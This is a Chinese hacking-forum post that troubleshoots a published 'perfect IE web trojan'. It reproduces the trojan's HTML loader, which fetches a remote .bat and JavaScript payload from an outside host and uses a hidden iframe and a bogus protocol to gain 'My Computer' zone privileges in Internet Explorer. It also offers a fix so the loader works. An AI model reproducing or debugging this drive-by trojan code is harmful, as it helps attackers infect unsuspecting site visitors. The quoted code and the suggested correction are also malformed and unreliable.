“打造完美IE木馬”的纰漏

“打造完美的IE網頁木馬”-------http://bbs.hackbase.com/viewthread.php?tid=2705719&fpage=1

這篇精華大家都看了吧，有人說很好收藏了，有人說根本沒用。這到底行不行呢？

現在我來說說我實驗後的看法：

我們按他說的做：一個HTM，一個JS。大家看願文的HTM部分：

============================================
<HTML>
<HEAD>
<META http-equiv=Content-Type content="text/html; charset=gb2312">
<TITLE>冰狐浪子網絡技術實驗室的完美IE網頁木馬</TITLE>
</HEAD>
<BODY oncontextmenu="return false" onselectstart="return false" scroll="no" topmargin="0" leftmargin="0">
<SCRIPT LANGUAGE="icyfoxlovelace" src="http://www.godog.y365.com/wodemuma/icyfox.bat"></SCRIPT>
<SCRIPT LANGUAGE="javascript">
//此處設置上面icyfox.js文件的網絡地址
//請把http://www.godog.y365.com/wodemuma/icyfox.js改為你的icyfox.js文件實際上傳地址
jsurl="http://www.godog.y365.com/wodemuma/icyfox.js".replace(///g,’//’);
WIE=navigator.appVersion;
if(WIE.indexOf("MSIE 5.0")>-1){
/*IE 5.0利用iframe標簽,src屬性設為icyfox://則會使此標簽具備“我的電腦”域的權限,原因是因為icyfox://是不存在的協議，所以會IE會利用res://協議打開SHDOCLC.DLL中的語法錯誤頁syntax.htm，而且SHDOCLC.DLL又位於系統目錄中，為在 icyfox.js中得到WINDOWS系統目錄和系統盤提供數據；*/
document.write("<iframe style=’display:none;’ name=’icyfoxlovelace’ src=’icyfox://’></iframe>");
setTimeout("muma0()",1000);
}
else {
===================================

大家看這裡

原文中“//請把http://www.godog.y365.com/wodemuma/icyfox.js改為你的icyfox.js文件實際上傳地址
jsurl="http://www.godog.y365.com/wodemuma/icyfox.js".replace(///g,’//’);“最後的replace(///g,’//’)我想可能是作者的失誤，要不就是我的機器問題了，如果直接打開這個HTM是不會想作者說的引用icyfox.js的，這裡有點小問題--------replace(///g,’//’);這句話的意思是把全部的”/“用”//“取代。這裡應該該為-----replace(///g,“//”);看出區別了嗎？ 把單撇該為引號， 否則浏覽器是會報錯而不能轉向ICYFOX.JS
改了後IE自動打開 icyfox/// (如果你是沒改JS文件名的話)
我是IE6.0SP1，還是打不開木馬程序。作者說“/*IE 5.0利用iframe標簽,src屬性設為icyfox://則會使此標簽具備“我的電腦”域的權限,原因是因為icyfox://是不存在的協議，所以會IE會利用res://協議打開SHDOCLC.DLL中的語法錯誤頁syntax.htm，而且SHDOCLC.DLL又位於系統目錄中，為在 icyfox.js中得到WINDOWS系統目錄和系統盤提供數據；*/ ”“/*IE5.5、 IE6.0則利用_search漏洞，把打開的地址設為icyfox://，從而使_search搜索框具備“我的電腦”域的權限，因為在IE6.0中無法用上面的iframe漏洞，IE5.5應該可以用，我沒有測試。這樣做的結果會打開搜索欄,有點遺憾！*/ ”
我沒法實驗，我的浏覽起並沒用res://協議打開也沒打開搜索欄，用Microsoft.XMLHTTP控件也不成功。

就是這些，希望我說的是對的，給實驗的朋友一些幫助，呵呵